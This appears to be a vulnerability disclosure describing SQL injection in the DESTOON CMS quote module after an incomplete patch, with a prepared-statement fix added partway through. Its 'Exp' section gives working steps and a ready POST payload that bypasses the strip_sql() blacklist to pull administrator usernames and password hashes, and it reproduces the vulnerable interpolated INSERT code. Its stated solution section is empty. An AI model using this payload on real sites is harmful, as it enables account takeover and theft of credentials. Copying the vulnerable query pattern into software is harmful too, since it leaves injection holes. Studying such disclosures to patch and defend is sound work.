Injection caused by an incomplete DESTOON patch
2014-07-22
Brief description: the patch only covers the key spots.
Detailed description:
$post = daddslashes(dstripslashes($post));

The patch only applied daddslashes() to $post, but special characters can still be stored at registration time, and a place where that stored value is used was found:

extract($USER, EXTR_PREFIX_ALL, '');  // initialization in common.inc.php (login)
/module/quote/price.inc.php, lines 24-28:

if($_userid) $post['company'] = $_company;  // used here
require DT_ROOT.'/module/'.$module.'/price.class.php';
$do = new price;
if($do->pass($post)) {
    $do->add($post);  // enter the process
price.class.php:

function add($post) {
    global $MOD, $L;
    $post = $this->set($post);
    $sqlk = $sqlv = '';
    foreach($post as $k => $v) {
        if(in_array($k, $this->fields)) { $sqlk .= ','.$k; $sqlv .= ",'$v'"; }  // traverse the data
    }
    $sqlk = substr($sqlk, 1);
    $sqlv = substr($sqlv, 1);
    $this->db->query("INSERT INTO {$this->table} ($sqlk) VALUES ($sqlv)");  // enter the query process
    $this->itemid = $this->db->insert_id();
    $this->update($this->itemid, $post);
    $this->product($this->itemid, $post['pid']);
    return $this->itemid;
}
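The root cause in add() is that every value is interpolated into the query string, so the column whitelist alone does not help once a stored value contains a backslash or quote. As an added example (not DESTOON's own code), here is the same insert written with a mysqli prepared statement: column names stay whitelisted, values are bound. The table name, the field list and the mysqli connection are assumptions for illustration.

```php
<?php
// Added example, not DESTOON's own code: a hardened version of price::add().
// Assumes a mysqli connection and the same table/fields members as the original class.
class price_safe
{
    private mysqli $db;
    private string $table = 'destoon_quote_price';  // assumed table name
    private array $fields = ['itemid', 'market', 'price', 'areaid', 'company', 'note'];  // assumed

    public function __construct(mysqli $db)
    {
        $this->db = $db;
    }

    public function add(array $post): int
    {
        $cols = [];
        $vals = [];
        foreach ($post as $k => $v) {
            // Column names cannot be bound as parameters, so they stay whitelisted.
            if (in_array($k, $this->fields, true)) {
                $cols[] = "`$k`";
                $vals[] = (string) $v;
            }
        }
        if (!$cols) {
            throw new InvalidArgumentException('no insertable fields in post data');
        }
        $placeholders = implode(',', array_fill(0, count($vals), '?'));
        $sql = "INSERT INTO `{$this->table}` (" . implode(',', $cols) . ") VALUES ($placeholders)";
        $stmt = $this->db->prepare($sql);
        if ($stmt === false) {
            throw new RuntimeException('prepare failed: ' . $this->db->error);
        }
        // Values travel separately from the SQL text: a company of "xxxx\" and a
        // crafted note are stored as literal strings instead of being parsed as SQL.
        $stmt->bind_param(str_repeat('s', count($vals)), ...$vals);
        if (!$stmt->execute()) {
            throw new RuntimeException('execute failed: ' . $stmt->error);
        }
        return (int) $this->db->insert_id;
    }
}
```

The same change applies to the update() and product() calls that follow; a blacklist such as strip_sql() is not needed once no value can alter the query structure.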
Because the stored company value is not escaped here, a trailing backslash in it escapes the closing single quote of its own field, and the value of the next field lands inside the SQL statement, so injection is possible.
Now look at strip_sql(). This update added a plus sign to the character class, but it can still be bypassed.
function strip_sql($string) {
    $match = array("/union/i", "/where/i", "/0x([a-z0-9]{2,})/i", "/select([\s\*\/\-\(\+])/i", "/update([\s\*\/\-\(\+])/i", "/replace([\s\*\/\-\(\+])/i", "/delete([\s\*\/\-\(\+])/i", "/drop([\s\*\/\-\(\+])/i", "/outfile([\s\*\/\-\(\+])/i", "/dumpfile([\s\*\/\-\(\+])/i", "/load_file[\s]*\(/i", "/substring[\s]*\(/i", "/substr[\s]*\(/i", "/left[\s]*\(/i", "/concat[\s]*\(/i", "/concat_ws[\s]*\(/i", "/ascii[\s]*\(/i", "/hex[\s]*\(/i", "/ord[\s]*\(/i", "/char[\s]*\(/i");
    $replace = array('union', 'where', '0x\\1', 'select\\1', 'update\\1', 'replace\\1', 'delete\\1', 'drop\\1', 'outfile\\1', 'dumpfile\\1', 'load_file(', 'substring(', 'substr(', 'left(', 'concat(', 'concat_ws(', 'ascii(', 'hex(', 'ord(', 'char(');
    return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
}
(SELECT @pw:=pw FROM (SELECT @p:=(MAKE_SET(-1, admin, username, password)) AS pw FROM destoon_member ORDER BY admin DESC) c LIMIT 0,1)

This bypasses it.
Note that a product quote must exist: itemid is the product quote id.
Exp:
Register an account, intercept the registration POST data, and change company to xxxx\
While logged in, request:
http://x.com/quote/price.php
itemid=1&post[market]=1&post[price]=50&post[areaid]=1&post[company]=OK&post[note]=,(SELECT @pw:=pw FROM (SELECT @p:=(MAKE_SET(-1, admin, username, password)) AS pw FROM destoon_member ORDER BY admin DESC) c LIMIT 0,1),1,1,1,1,1)#&captcha=rs8h&submit=OK
Proof of vulnerability:
Solution:
..